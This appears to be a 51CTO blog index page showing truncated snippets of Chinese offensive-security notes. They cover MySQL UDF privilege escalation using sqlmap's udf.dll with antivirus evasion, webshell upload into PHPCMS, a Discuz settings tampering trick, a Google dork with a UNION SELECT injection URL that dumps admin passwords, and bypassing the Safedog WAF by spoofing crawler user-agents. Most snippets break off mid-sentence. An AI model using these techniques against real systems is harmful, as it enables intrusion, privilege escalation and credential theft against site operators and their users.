51CTO博客开发
刚在http://www.rabbit8.cn/MYSQL/395.html,看到建立lib\plugin目录的方法.留个脚印查询 select @@basedir (或者 select @@datadir)得到MySQL目录 C:\MySql\假如该目录不存在\lib\plugin目录,利用ADS创建查询 select 'xxx' into dumpfile 'C:\\M
测试环境 windows2008R2_64,mysql 5.0.*_32使用的sqlmap中提供的udf.dll 过了nod32,成功上传中间有个误区,刚开始以为是根据系统的版本是否32位、64位来选择dll,在开始上传的64的udf的dll,提示错误,纠结了很久最后上传了一个32位的dll,成功执行:create function sys_eval returns string soname &
原帖地址内容:http://zone.wooyun.org/content/3894用户 – 用户栏目 – 栏目分组 – 提交 – 抓包 (我就是在这步出错的,一定要提交,不然抓到的数据包不一样)1Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"改为1Conte
见http://www.wooyun.org/bugs/wooyun-2010-03787以前6.5的有人发的方法是,(进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传,新版使用uploadm~num.php来递增数字)发现6.6不行,上传之后会变成类似uploadm1324885505nXmTdQam
cmd--telnet--输入set localecho
1.google搜索:inurl:"userinfo.asp?yhm="2.注入exp:直接暴管理员密码/userinfo.asp?yhm='%20union%20select%201,2,3,yhm%2bchr(35)%2bpass,5,6,7,8,9,10,11,12,13,14,15%20from%20yrwl_tb_admin /ad.asp?ad='%20union
导出所有的规则到文本中 netsh ipsec static show all > ipsec.txt
转自:http://www.cnseay.com/2751/ 伪造爬虫的user-agent来进行绕过. 如果是你做网站,装了WAF,肯定是会把搜索引擎的爬虫放到白名单里面,不然SEO就蛋疼了。 白名单意味着啥??? 就是说在白名单里面的用户,WAF都会不管它,直接放行,那我们就可以利用这个东西来绕过安全狗。 搜索引擎爬虫是在安全狗的白名单
内容: SID: S-1-0 Name: Null Authority SID: S-1-0-0 Name: Nobody SID: S-1-1 Name: World Authority SID:
//获取当前粘贴板数据//利用场景,用于半自动化,如获取要执行的代码,脚本上传执行,获取返回结果等if ( OpenClipboard(NULL) ) { HANDLE hData
cd /d %~dp0
int VengConfig::GetFileType(LPCTSTR lpszFileName) { CFile file; byte buf[
//引用网上的一篇文章进行的修改 ,2003的所在注册表位置和其他的系统位置不同 //hkey 是注册表主键,如HKEY_LOCAL_MACHINE,szUrl为IP地址(原文中有域名的添加方法,这里去掉了) BOOL VengFuncConfig::SetTrustfulUrl(HKEY hKey, TCHAR
CString VengConfig::GetSysCheckTmpPath(void) { TCHAR TmpPath[MAX_PATH]={0}; LPITEMIDLIST pidl; &n
Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号